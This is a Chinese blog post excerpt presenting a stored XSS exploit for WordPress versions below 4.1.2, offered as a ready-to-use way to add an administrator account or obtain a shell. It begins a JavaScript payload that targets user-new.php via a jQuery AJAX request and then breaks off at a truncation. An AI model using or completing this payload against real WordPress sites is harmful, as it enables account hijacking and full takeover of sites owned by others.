Wordpress < 4.1.2 存储型XSS EXP

ph发了一个wp的xss的poc,然有人问我要exp.. 其实Jin神早就在zone里发过了,这里直接稍微改改引用就能成功执行添加管理员或getshell 代码如下:(转载请注明原创0x_Jin) 1.添加管理员 var a = location.href.split('/'); var xurl = location.href.replace(a[a.length-1],"user-new.php"); jQuery.ajax({   url: xurl,   type: 'GET',   dat...

阅读全文>>